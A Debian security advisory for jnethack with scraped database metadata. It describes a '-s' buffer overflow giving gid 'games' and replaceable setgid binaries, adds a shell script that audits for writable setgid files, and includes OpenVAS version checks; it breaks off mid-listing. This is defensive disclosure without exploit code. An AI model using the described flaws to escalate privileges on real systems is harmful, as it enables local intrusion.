[SECURITY] [DSA-316-3] New jnethack packages fix buffer overflow, incorrect permissions
2003-06-17T00:00:00
ID DEBIAN:DSA-316-3:6D849 Type debian Reporter Debian Modified 2003-06-17T00:00:00
Description
Debian Security Advisory DSA 316-3 security@debian.org
http://www.debian.org/security/ Matt Zimmerman
June 17th, 2003 http://www.debian.org/security/faq
Package : jnethack
Vulnerability : buffer overflow, incorrect permissions
Problem-Type : local
Debian-specific: no
CVE Id : CAN-2003-0358 CAN-2003-0359
The jnethack package is vulnerable to a buffer overflow exploited via a
long '-s' command line option. This vulnerability could be used by an
attacker to gain gid 'games' on a system where jnethack is installed.

Additionally, some setgid binaries in the jnethack package have
incorrect permissions, which could allow a user who gains gid 'games'
to replace these binaries, potentially causing other users to execute
malicious code when they run jnethack.

For the stable distribution (woody) these problems have been fixed in
version 1.1.5-11woody2.

For the old stable distribution (potato) these problems have been
fixed in version 1.1.3-4potato1.

For the unstable distribution (sid) these problems are fixed in
version 1.1.5-15.

We recommend that you update your jnethack package.
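
A check for the permissions problem described above (CAN-2003-0359), added here as an example and not part of the Debian advisory: it lists setgid files under a directory that are writable by group or other, or that sit in a non-sticky directory writable by group or other, since either condition lets a member of the owning group replace the binary. The function names, finding labels and fixture paths are constructed for illustration; the advisory does not name the affected files.

```shell
#!/bin/sh
# Added example (not from the advisory): find setgid files that a member of
# the owning group, or any user, could overwrite or replace.

# audit_setgid DIR
# Prints one finding per line:
#   WRITABLE-FILE <path>  the setgid file itself is group- or world-writable
#   WRITABLE-DIR <path>   its directory is group- or world-writable and not
#                         sticky, so the file can be unlinked and recreated
audit_setgid() {
    find "$1" -type f -perm -2000 -print | while IFS= read -r f; do
        # Case 1: write permission on the file lets the group overwrite it.
        if [ -n "$(find "$f" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "WRITABLE-FILE $f"
        fi
        # Case 2: write permission on the parent directory lets the group
        # delete the file and drop a new one in its place. A sticky bit on
        # the directory restricts deletion to the owner, so skip those.
        d=$(dirname "$f")
        if [ -n "$(find "$d" -prune ! -perm -1000 \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "WRITABLE-DIR $f"
        fi
    done
}

# build_fixture
# Creates a constructed sample tree in a temporary directory and prints its
# path. File names are placeholders, not files shipped by any package.
build_fixture() {
    t=$(mktemp -d) || return 1
    mkdir "$t/safe" "$t/open"
    : > "$t/safe/game-a"; chmod 2755 "$t/safe/game-a"   # setgid, not writable: ok
    : > "$t/safe/game-b"; chmod 2775 "$t/safe/game-b"   # setgid, group-writable
    : > "$t/safe/plain";  chmod 0775 "$t/safe/plain"    # not setgid: ignored
    : > "$t/open/game-c"; chmod 2755 "$t/open/game-c"   # ok file, writable dir
    chmod 755 "$t/safe"
    chmod 775 "$t/open"
    echo "$t"
}

# With a directory argument, audit that tree; without one, run against the
# constructed fixture so the script can be tried offline.
if [ $# -gt 0 ]; then
    audit_setgid "$1"
else
    fixture=$(build_fixture)
    audit_setgid "$fixture"
    rm -rf "$fixture"
fi
```

An empty result for the directory holding the game binaries means no setgid file there can be overwritten or swapped by its group.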

Upgrade Instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

These files will probably be moved into the stable distribution on its
next revision.

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-316-3:6D849", "bulletinFamily": "unix", "title": "[SECURITY] [DSA-316-3] New jnethack packages fix buffer overflow, incorrect permissions", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 316-3 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 17th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : jnethack\nVulnerability : buffer overflow, incorrect permissions\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358 CAN-2003-0359\n\nThe jnethack package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where jnethack is installed.\n\nAdditionally, some setgid binaries in the jnethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run jnethack.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.1.5-11woody2.\n\nFor the old stable distribution (potato) these problems have been\nfixed in version 1.1.3-4potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 1.1.5-15.\n\nWe recommend that you update your jnethack package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source 
archives:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1.dsc\n Size/MD5 checksum: 666 8a7306bcffb423ea5f9986bf904e0ec8\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1.diff.gz\n Size/MD5 checksum: 38305 e89b3e56e48c49df7e3b42803c3c27cf\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3.orig.tar.gz\n Size/MD5 checksum: 3502710 d02f410b26031ad82adbae96cd1d4cbf\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_alpha.deb\n Size/MD5 checksum: 1949648 f99607e3dd2aa90acc364e81782e5ea5\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_arm.deb\n Size/MD5 checksum: 1721940 38deb475b51989b02cb26c6331602919\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_i386.deb\n Size/MD5 checksum: 1642800 e3e0d5e9d9c44996ba6125cca7ac565b\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_m68k.deb\n Size/MD5 checksum: 1596276 91eb29fdf055a4da35ed5c2d0807607e\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_powerpc.deb\n Size/MD5 checksum: 1716416 12299cb33fc58f99944ecf2bd155ac54\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_sparc.deb\n Size/MD5 checksum: 1731496 df2ac53286eabe63cd47eaf5f5b209fc\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2.dsc\n Size/MD5 checksum: 661 2332b8bedc5fe69a6b5a305e597866d6\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2.diff.gz\n Size/MD5 checksum: 12980 98e0902a5cb001847ad1d9c116f53dac\n 
http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5.orig.tar.gz\n Size/MD5 checksum: 3541121 b0f07cf82e2449c17185bd1cf89bb86b\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_alpha.deb\n Size/MD5 checksum: 1804310 617338310fd35aec8e63e05f60992fb7\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_arm.deb\n Size/MD5 checksum: 1657798 3c30134736b9fc5161d4baa5853c262d\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_i386.deb\n Size/MD5 checksum: 1595644 bb20baffb81e35f267ed6af682c6ffd8\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_ia64.deb\n Size/MD5 checksum: 1988626 eff2b9be824303b1524c245d7f3ac6eb\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_hppa.deb\n Size/MD5 checksum: 1694666 25cf60f2e501a1f0ba6a455caee52d0c\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_m68k.deb\n Size/MD5 checksum: 1555190 b067e550313b59786179d035204ce4e5\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_mips.deb\n Size/MD5 checksum: 1664662 798b9d23eaa9288e00d09976dc0d3f9d\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_mipsel.deb\n Size/MD5 checksum: 1663834 2a7e89a7dead85412917f3d2951a3138\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_powerpc.deb\n Size/MD5 checksum: 1640606 62cc4b8d86662f7c2d6f2abf61d913a2\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_s390.deb\n Size/MD5 checksum: 1636892 96ce1695a03565c16c3998de52750081\n\n 
Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_sparc.deb\n Size/MD5 checksum: 1652382 22b1e7c9ec2bfe051d1efaa05e7d0cd7\n\nThese files will probably be moved into the stable distribution on its\nnext revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "published": "2003-06-17T00:00:00", "modified": "2003-06-17T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00116.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "type": "debian", "lastseen": "2019-05-30T02:22:31", "edition": 2, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0358", "CVE-2003-0359"]}, {"type": "openvas", "idList": ["OPENVAS:53639", "OPENVAS:53605"]}, {"type": "debian", "idList": ["DEBIAN:DSA-316-1:48A9A", "DEBIAN:DSA-316-2:B22FD", "DEBIAN:DSA-350-1:7D62B"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-316.NASL", "DEBIAN_DSA-350.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:12021", "OSVDB:12020", "OSVDB:12019"]}, {"type": "exploitdb", "idList": ["EDB-ID:22234", "EDB-ID:22233", "EDB-ID:22235"]}], "modified": "2019-05-30T02:22:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-05-30T02:22:31", "rev": 2}, "vulnersScore": 7.1}, "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "arch": "all", "operator": "lt", "packageFilename": "jnethack_1.1.5-11woody2_all.deb", "packageName": "jnethack", "packageVersion": "1.1.5-11woody2"}, {"OS": "Debian", "OSVersion": "2.2", "arch": "all", 
"operator": "lt", "packageFilename": "jnethack_1.1.3-4potato1_all.deb", "packageName": "jnethack", "packageVersion": "1.1.3-4potato1"}], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:22:09", "description": "nethack 3.4.0 and earlier installs certain setgid binaries with insecure permissions, which allows local users to gain privileges by replacing the original binaries with malicious code.", "edition": 4, "cvss3": {}, "published": "2003-07-24T04:00:00", "title": "CVE-2003-0359", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0359"], "modified": "2008-09-05T20:34:00", "cpe": ["cpe:/a:stichting_mathematisch_centrum:nethack:3.4.0"], "id": "CVE-2003-0359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0359", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:stichting_mathematisch_centrum:nethack:3.4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:22:09", "description": "Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.", "edition": 4, "cvss3": {}, "published": "2003-06-09T04:00:00", "title": "CVE-2003-0358", "type": "cve", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0358"], "modified": "2020-12-09T15:15:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/a:falconseye_project:falconseye:1.9.3", "cpe:/o:debian:debian_linux:3.0", "cpe:/a:nethack:nethack:3.4.0"], "id": "CVE-2003-0358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0358", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:falconseye_project:falconseye:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:nethack:nethack:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:2.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:3.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "The remote host is missing an update to falconseye\nannounced via advisory DSA 350-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53639", "href": "http://plugins.openvas.org/nasl.php?oid=53639", "type": "openvas", "title": "Debian Security Advisory DSA 350-1 (falconseye)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_350_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 350-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The falconseye package is vulnerable to a buffer overflow exploited\nvia a long '-s' command line option. This vulnerability could be used\nby an attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCVE-2003-0359 which affected some other nethack packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.9.3-7woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.3-9.\n\nWe recommend that you update your falconseye package.\";\ntag_summary = \"The remote host is missing an update to falconseye\nannounced via advisory DSA 350-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20350-1\";\n\nif(description)\n{\n script_id(53639);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0358\", \"CVE-2003-0359\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 350-1 (falconseye)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"falconseye-data\", ver:\"1.9.3-7woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"falconseye\", ver:\"1.9.3-7woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "The remote host is missing an update to nethack\nannounced via advisory DSA 316-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53605", "href": "http://plugins.openvas.org/nasl.php?oid=53605", "type": "openvas", "title": "Debian Security Advisory DSA 316-1 (nethack)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_316_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 316-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The nethack package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where nethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.4.0-3.0woody3.\n\nFor the old stable distribution (potato) problem xxx has been fixed in\nversion 3.3.0-7potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 3.4.1-1.\n\nWe recommend that you update your nethack package.\";\ntag_summary = \"The remote host is missing an update to nethack\nannounced via advisory DSA 316-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20316-1\";\n\nif(description)\n{\n script_id(53605);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 
2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0358\", \"CVE-2003-0359\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 316-1 (nethack)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"nethack\", ver:\"3.3.0-7potato1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-common\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-gnome\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-qt\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-x11\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:53", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 316-2 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 11th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : slashem\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358\n\nThe slashem package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where slashem is installed.\n\nNote that slashem does not contain the file permission problem\nCAN-2003-0359, addressed in nethack in DSA-316-1.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 0.0.6E4F8-4.0woody3.\n\nFor the old stable distribution (potato) problem xxx has been fixed in\nversion 0.0.5E7-3potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 0.0.6E4F8-6.\n\nWe recommend that you update your slashem package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1.dsc\n Size/MD5 checksum: 646 
c1260aec0e4482acf4f92a50a339aeb2\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1.diff.gz\n Size/MD5 checksum: 18514 cf58b260c973a4904ca17585364f9479\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7.orig.tar.gz\n Size/MD5 checksum: 3417627 fb572487b96b31af79b53f6d8fc5d0ea\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_alpha.deb\n Size/MD5 checksum: 1407622 befbf1f68b7f09e84d13336867e7ef05\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_arm.deb\n Size/MD5 checksum: 1166174 5f375d78fbee11fb197cc18b2c1b6035\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_i386.deb\n Size/MD5 checksum: 1069950 b631b6f9ff0b11eeb6b2d3c337dc42b6\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_m68k.deb\n Size/MD5 checksum: 1021770 1b7197100e7c59e108b02d4f9fd2c832\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_powerpc.deb\n Size/MD5 checksum: 1151790 1cfe94de576794a4f4ae31a51f2cb48d\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_sparc.deb\n Size/MD5 checksum: 1172080 0f42ad8b59d725dc637d36cc792f1cfd\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3.dsc\n Size/MD5 checksum: 671 6e0378a87cfb1eb63b584da9f7ebee00\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3.diff.gz\n Size/MD5 checksum: 13165 2f698a1a083465bbfd1f875f9875ecdc\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8.orig.tar.gz\n Size/MD5 checksum: 4331015 2abd847d4f5fc426d6c7ed5a97b0de99\n\n Alpha architecture:\n\n 
http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_alpha.deb\n Size/MD5 checksum: 1868864 9e59db9dffbc4fdb3973775236b56b2d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_arm.deb\n Size/MD5 checksum: 1576768 9bd2470960f06c7b404e10fbdc70f7e3\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_i386.deb\n Size/MD5 checksum: 1465086 bf5fda3a71bf45ea444006a45d43ee5d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_ia64.deb\n Size/MD5 checksum: 2125556 8c1e66316b4b03ec74389b1da3fe2cc8\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_hppa.deb\n Size/MD5 checksum: 1714032 6944f94947bce488e1331cf3acdcf738\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_m68k.deb\n Size/MD5 checksum: 1411706 9caae66305fdb6e82afaf93442ea96af\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_mips.deb\n Size/MD5 checksum: 1628620 cc0c4fedd449ce5f80349ea3ad816ec8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_mipsel.deb\n Size/MD5 checksum: 1632522 e6b46c75fa17fe82c0791868371a6db6\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_powerpc.deb\n Size/MD5 checksum: 1574996 9085a3b1e5708599f8ec9e62693977d8\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_s390.deb\n Size/MD5 checksum: 1549104 829ed8bd7743d2eeae4e17392faad905\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_sparc.deb\n Size/MD5 checksum: 
